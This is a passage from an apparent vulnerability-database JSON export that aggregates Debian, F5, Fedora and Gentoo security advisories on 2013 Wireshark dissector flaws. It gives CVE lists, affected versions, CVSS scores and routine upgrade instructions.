CVE-2013-4083\n\nMultiple vulnerabilities were discovered in the dissectors for CAPWAP, \nGMR-1 BCCH, PPP, NBAP, RDP, HTTP, DCP ETSI and in the Ixia IxVeriWave \nfile parser, which could result in denial of service or the execution of \narbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.2-5wheezy4.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your wireshark packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2013-06-17T16:52:49", "published": "2013-06-17T16:52:49", "id": "DEBIAN:DSA-2709-1:755B4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00117.html", "title": "[SECURITY] [DSA 2709-1] wireshark security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-4932", "CVE-2013-4075", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4936", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can use **tcpdump** utility instead of Wireshark (tshark). For more information about using **tcpdump**, refer to SOL411: Overview of packet tracing with the tcpdump utility \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL9502: BIG-IP hotfix matrix\n * SOL15113: BIG-IQ hotfix matrix\n", "modified": "2016-07-22T00:00:00", "published": "2014-11-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15868.html", "id": "SOL15868", "title": "SOL15868 - Multiple Wireshark vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:17", "bulletinFamily": "software", "cvelist": ["CVE-2013-4921", "CVE-2013-4079", "CVE-2013-4931", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2013-4078", "CVE-2013-4924", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-4932", "CVE-2013-4075", "CVE-2013-4923", "CVE-2013-4925", "CVE-2013-4083", "CVE-2013-4922", "CVE-2013-4936", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2013-4077"], "edition": 1, "description": "\nF5 Product Development has assigned ID 439062 (BIG-IP), ID 474492 (Enterprise Manager), and ID 474493 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP AAM| 11.4.0 - 11.5.2| 11.6.0| Wireshark (tshark) \nBIG-IP AFM| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1| Wireshark (tshark) \nBIG-IP Analytics| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1| Wireshark (tshark) \nBIG-IP APM| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Wireshark (tshark) \nBIG-IP ASM| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP Edge Gateway| 11.3.0| 11.0.0 - 11.2.1 \n10.1.0 - 10.2.4| Wireshark (tshark) \nBIG-IP GTM| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP Link Controller| 11.3.0 - 11.5.2| 11.6.0 \n11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP PEM| 11.3.0 - 11.5.2| 11.6.0| Wireshark (tshark) \nBIG-IP PSM| 11.3.0 - 11.4.1| 11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP WebAccelerator| 11.3.0| 11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nBIG-IP WOM| 11.3.0| 11.0.0 - 11.2.1 \n10.0.0 - 10.2.4| Wireshark (tshark) \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.1.0 - 3.1.1| 3.0.0 \n2.1.0 - 2.3.0| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Wireshark (tshark) \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Wireshark (tshark) \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Wireshark (tshark) \nBIG-IQ ADC| 4.5.0| None| Wireshark (tshark) \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Wireshark (tshark) \nBIG-IQ Cloud and Orchestration| None| 1.0.0| None\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can use **tcpdump** utility instead of Wireshark (tshark). For more information about using **tcpdump**, refer to [K411: Overview of packet tracing with the tcpdump utility](<https://support.f5.com/csp/article/K411>) \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "modified": "2017-03-10T00:55:00", "published": "2014-11-27T19:06:00", "id": "F5:K15868", "href": "https://support.f5.com/csp/article/K15868", "title": "Multiple Wireshark vulnerabilities", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3555", "CVE-2013-3557", "CVE-2013-3558", "CVE-2013-3559", "CVE-2013-3560", "CVE-2013-3562", "CVE-2013-4074", "CVE-2013-4075", "CVE-2013-4076", "CVE-2013-4077", "CVE-2013-4078", "CVE-2013-4079", "CVE-2013-4080", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4083", "CVE-2013-4920", "CVE-2013-4921", "CVE-2013-4922", "CVE-2013-4923", "CVE-2013-4924", "CVE-2013-4925", "CVE-2013-4926", "CVE-2013-4927", "CVE-2013-4928", "CVE-2013-4929", "CVE-2013-4930", "CVE-2013-4931", "CVE-2013-4932", "CVE-2013-4933", "CVE-2013-4934", "CVE-2013-4935"], "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "modified": "2013-12-19T07:14:40", "published": "2013-12-19T07:14:40", "id": "FEDORA:006F523064", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: wireshark-1.10.2-4.fc18", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3555", "CVE-2013-3557", "CVE-2013-3558", "CVE-2013-3559", "CVE-2013-3560", "CVE-2013-3562", "CVE-2013-4074", "CVE-2013-4075", "CVE-2013-4076", "CVE-2013-4077", "CVE-2013-4078", "CVE-2013-4079", "CVE-2013-4080", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4083", "CVE-2013-4920", "CVE-2013-4921", "CVE-2013-4922", "CVE-2013-4923", "CVE-2013-4924", "CVE-2013-4925", "CVE-2013-4926", "CVE-2013-4927", "CVE-2013-4928", "CVE-2013-4929", "CVE-2013-4930", "CVE-2013-4931", "CVE-2013-4932", "CVE-2013-4933", "CVE-2013-4934", "CVE-2013-4935"], "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "modified": "2013-09-28T00:16:37", "published": "2013-09-28T00:16:37", "id": "FEDORA:ADAF820FE5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: wireshark-1.10.2-6.fc19", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3555", "CVE-2013-3557", "CVE-2013-3558", "CVE-2013-3559", "CVE-2013-3560", "CVE-2013-3562", "CVE-2013-4074", "CVE-2013-4075", "CVE-2013-4076", "CVE-2013-4077", "CVE-2013-4078", "CVE-2013-4079", "CVE-2013-4080", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-4083", "CVE-2013-4920", "CVE-2013-4921", "CVE-2013-4922", "CVE-2013-4923", "CVE-2013-4924", "CVE-2013-4925", "CVE-2013-4926", "CVE-2013-4927", "CVE-2013-4928", "CVE-2013-4929", "CVE-2013-4930", "CVE-2013-4931", "CVE-2013-4932", "CVE-2013-4933", "CVE-2013-4934", "CVE-2013-4935"], "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "modified": "2013-10-03T01:07:39", "published": "2013-10-03T01:07:39", "id": "FEDORA:8BBF3212B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: wireshark-1.10.2-7.fc20", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0068", "CVE-2013-3561", "CVE-2012-4297", "CVE-2012-4048", "CVE-2013-4921", "CVE-2013-4079", "CVE-2012-0066", "CVE-2013-4931", "CVE-2012-4049", "CVE-2013-4076", "CVE-2013-4928", "CVE-2013-4926", "CVE-2013-4933", "CVE-2012-4288", "CVE-2013-3562", "CVE-2013-4078", "CVE-2013-4924", "CVE-2012-4294", "CVE-2012-4292", "CVE-2013-4920", "CVE-2013-4927", "CVE-2013-3559", "CVE-2013-4932", "CVE-2012-0043", "CVE-2013-3558", "CVE-2013-3556", "CVE-2012-4289", "CVE-2012-4291", "CVE-2012-4287", "CVE-2012-4298", "CVE-2012-4296", "CVE-2013-3555", "CVE-2013-4075", "CVE-2013-3560", "CVE-2012-3548", "CVE-2012-0042", "CVE-2013-4923", "CVE-2013-4925", "CVE-2012-0041", "CVE-2012-0067", "CVE-2012-4290", "CVE-2013-4083", "CVE-2013-4922", "CVE-2012-4285", "CVE-2013-4936", "CVE-2012-4286", "CVE-2012-4293", "CVE-2013-4929", "CVE-2013-4935", "CVE-2013-4930", "CVE-2013-4081", "CVE-2013-4082", "CVE-2013-3557", "CVE-2013-4080", "CVE-2013-4934", "CVE-2013-4074", "CVE-2012-4295", "CVE-2013-4077"], "edition": 1, "description": "### Background\n\nWireshark is a versatile network protocol analyzer.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Wireshark 1.10 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.10.1\"\n \n\nAll Wireshark 1.8 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.8.9\"", "modified": "2013-08-30T00:00:00", "published": "2013-08-28T00:00:00", "id": "GLSA-201308-05", "href": "https://security.gentoo.org/glsa/201308-05", "type": "gentoo", "title": "Wireshark: Multiple vulnerabilities", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
